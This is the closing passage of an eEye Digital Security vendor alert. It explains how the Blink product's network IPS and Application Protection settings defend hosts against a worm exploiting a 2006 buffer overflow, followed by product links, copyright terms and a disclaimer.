- Intrusion Prevention System
Blink's IPS functionality has mitigated this attack at the network layer since the vulnerability's public disclosure and patch on June 12, 2006. Customers should therefore ensure that Blink's IPS is enabled and not configured in Passive mode, so that this IPS signature actually blocks the traffic.
- Application Protection
If the network IPS is disabled by the user, the next layer of defense is Blink's Application Protection, which generically prevents this buffer overflow attack. Verify that the Application Protection policy option is set to its default, "Terminate process and restart on malicious API calls".
If both settings are enabled, Blink customers would have two distinct lines of defense against this specific worm to keep their hosts secure.
Links:
Blink Personal - Unified Client Security - Free For Home Use
Blink Professional - Unified Client Security - Free Trial
Retina Network Security Scanner - Trial
Copyright ©1998-2010 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.